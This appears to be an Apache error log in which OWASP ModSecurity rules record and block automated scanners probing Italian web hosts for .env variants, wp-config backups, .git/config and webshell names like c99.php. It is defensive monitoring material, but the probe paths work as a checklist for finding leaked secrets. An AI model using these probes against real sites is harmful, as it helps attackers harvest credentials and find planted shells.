[Fri Jan 09 21:55:14.315375 2026] [:error] [pid 1290985] [client 185.177.72.61:12472] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aWFrMghnMz7Kl76N6_LznwAAAAA"]
[Fri Jan 09 21:55:14.315618 2026] [:error] [pid 1290985] [client 185.177.72.61:12472] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aWFrMghnMz7Kl76N6_LznwAAAAA"]
[Fri Jan 09 21:55:14.315765 2026] [:error] [pid 1290985] [client 185.177.72.61:12472] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aWFrMghnMz7Kl76N6_LznwAAAAA"]
[Fri Jan 09 21:55:16.431493 2026] [:error] [pid 1295009] [client 185.177.72.61:48496] [client 185.177.72.61] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWFrNBOQmYLXvoRWxa_U0AAAAAc"]
[Fri Jan 09 21:55:16.431636 2026] [:error] [pid 1295009] [client 185.177.72.61:48496] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWFrNBOQmYLXvoRWxa_U0AAAAAc"]
[Fri Jan 09 21:55:16.431849 2026] [:error] [pid 1295009] [client 185.177.72.61:48496] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWFrNBOQmYLXvoRWxa_U0AAAAAc"]
[Fri Jan 09 21:55:16.431986 2026] [:error] [pid 1295009] [client 185.177.72.61:48496] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aWFrNBOQmYLXvoRWxa_U0AAAAAc"]
[Fri Jan 09 21:55:16.545576 2026] [:error] [pid 1290987] [client 185.177.72.61:48502] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aWFrNJa6YpMWICkHe7jGgAAAAAI"]
[Fri Jan 09 21:55:16.545807 2026] [:error] [pid 1290987] [client 185.177.72.61:48502] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aWFrNJa6YpMWICkHe7jGgAAAAAI"]
[Fri Jan 09 21:55:16.545983 2026] [:error] [pid 1290987] [client 185.177.72.61:48502] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aWFrNJa6YpMWICkHe7jGgAAAAAI"]
[Fri Jan 09 21:55:20.683318 2026] [:error] [pid 1295010] [client 185.177.72.61:48506] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/bootstrap/.env"] [unique_id "aWFrOCTjpONdb2ogUxon0QAAAAg"]
[Fri Jan 09 21:55:20.683561 2026] [:error] [pid 1295010] [client 185.177.72.61:48506] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/bootstrap/.env"] [unique_id "aWFrOCTjpONdb2ogUxon0QAAAAg"]
[Fri Jan 09 21:55:20.683720 2026] [:error] [pid 1295010] [client 185.177.72.61:48506] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/bootstrap/.env"] [unique_id "aWFrOCTjpONdb2ogUxon0QAAAAg"]
[Fri Jan 09 21:55:41.745179 2026] [:error] [pid 1290989] [client 185.177.72.61:25462] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.txt"] [unique_id "aWFrTbwxb_CFGAx2PBFTKQAAAAQ"]
[Fri Jan 09 21:55:41.745401 2026] [:error] [pid 1290989] [client 185.177.72.61:25462] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.txt"] [unique_id "aWFrTbwxb_CFGAx2PBFTKQAAAAQ"]
[Fri Jan 09 21:55:41.745555 2026] [:error] [pid 1290989] [client 185.177.72.61:25462] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.txt"] [unique_id "aWFrTbwxb_CFGAx2PBFTKQAAAAQ"]
[Fri Jan 09 21:55:48.126642 2026] [:error] [pid 1290986] [client 185.177.72.61:9028] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aWFrVHvPx48oXeBpWHAqgQAAAAE"]
[Fri Jan 09 21:55:48.126863 2026] [:error] [pid 1290986] [client 185.177.72.61:9028] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aWFrVHvPx48oXeBpWHAqgQAAAAE"]
[Fri Jan 09 21:55:48.127036 2026] [:error] [pid 1290986] [client 185.177.72.61:9028] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aWFrVHvPx48oXeBpWHAqgQAAAAE"]
[Fri Jan 09 21:55:54.200385 2026] [:error] [pid 1290985] [client 185.177.72.61:9030] [client 185.177.72.61] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.deploy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.deploy"] [unique_id "aWFrWghnMz7Kl76N6_LzoQAAAAA"]
[Fri Jan 09 21:55:54.200605 2026] [:error] [pid 1290985] [client 185.177.72.61:9030] [client 185.177.72.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.deploy"] [unique_id "aWFrWghnMz7Kl76N6_LzoQAAAAA"]
[Fri Jan 09 21:55:54.200773 2026] [:error] [pid 1290985] [client 185.177.72.61:9030] [client 185.177.72.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.deploy"] [unique_id "aWFrWghnMz7Kl76N6_LzoQAAAAA"]
[Sun Jan 11 05:48:04.850468 2026] [:error] [pid 1336281] [client 204.76.203.25:39046] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWMrhMh5fehf2NO8kLqyKAAAAAQ"]
[Sun Jan 11 05:48:04.850737 2026] [:error] [pid 1336281] [client 204.76.203.25:39046] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWMrhMh5fehf2NO8kLqyKAAAAAQ"]
[Sun Jan 11 05:48:04.850881 2026] [:error] [pid 1336281] [client 204.76.203.25:39046] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aWMrhMh5fehf2NO8kLqyKAAAAAQ"]
[Sun Jan 11 12:35:13.077372 2026] [php:error] [pid 1337866] [client 20.239.71.136:22254] script '/var/www/magento.test.indacotrentino.com/www/pub/images/c99.php' not found or unable to stat
[Sun Jan 11 12:35:27.317960 2026] [php:error] [pid 1337866] [client 20.239.71.136:22254] script '/var/www/magento.test.indacotrentino.com/www/pub/images/2008.php' not found or unable to stat
[Sun Jan 11 12:35:44.608933 2026] [php:error] [pid 1336316] [client 20.239.71.136:35885] script '/var/www/magento.test.indacotrentino.com/www/pub/images/uploadform.php' not found or unable to stat
[Sun Jan 11 17:29:35.771865 2026] [authz_core:error] [pid 1348471] [client 157.245.36.108:42890] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Jan 11 17:29:38.755957 2026] [:error] [pid 1348497] [client 157.245.36.108:42922] [client 157.245.36.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWPP8vjEX9glyTkwiI6coQAAAAY"]
[Sun Jan 11 17:29:38.756182 2026] [:error] [pid 1348497] [client 157.245.36.108:42922] [client 157.245.36.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWPP8vjEX9glyTkwiI6coQAAAAY"]
[Sun Jan 11 17:29:38.756341 2026] [:error] [pid 1348497] [client 157.245.36.108:42922] [client 157.245.36.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWPP8vjEX9glyTkwiI6coQAAAAY"]
[Sun Jan 11 23:12:39.660449 2026] [:error] [pid 1348506] [client 204.76.203.25:40160] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWQgV4BjYV-ATfM8kBezLwAAAAg"]
[Sun Jan 11 23:12:39.660703 2026] [:error] [pid 1348506] [client 204.76.203.25:40160] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWQgV4BjYV-ATfM8kBezLwAAAAg"]
[Sun Jan 11 23:12:39.660857 2026] [:error] [pid 1348506] [client 204.76.203.25:40160] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWQgV4BjYV-ATfM8kBezLwAAAAg"]
[Mon Jan 12 02:45:43.490945 2026] [:error] [pid 1354515] [client 54.173.215.84:60078] [client 54.173.215.84] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWRSRzF-EhHlFkhDaAJSZgAAABE"]
[Mon Jan 12 02:45:43.491205 2026] [:error] [pid 1354515] [client 54.173.215.84:60078] [client 54.173.215.84] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWRSRzF-EhHlFkhDaAJSZgAAABE"]
[Mon Jan 12 02:45:43.491372 2026] [:error] [pid 1354515] [client 54.173.215.84:60078] [client 54.173.215.84] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWRSRzF-EhHlFkhDaAJSZgAAABE"]
[Mon Jan 12 05:19:25.864108 2026] [:error] [pid 1355924] [client 185.177.72.66:58410] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aWR2TdIpinFXoPzDav5wEQAAAAE"]
[Mon Jan 12 05:19:25.864382 2026] [:error] [pid 1355924] [client 185.177.72.66:58410] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aWR2TdIpinFXoPzDav5wEQAAAAE"]
[Mon Jan 12 05:19:25.864525 2026] [:error] [pid 1355924] [client 185.177.72.66:58410] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aWR2TdIpinFXoPzDav5wEQAAAAE"]
[Mon Jan 12 05:19:29.966188 2026] [:error] [pid 1355927] [client 185.177.72.66:45050] [client 185.177.72.66] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWR2UU4YgaRMJb38LtMi4gAAAAQ"]
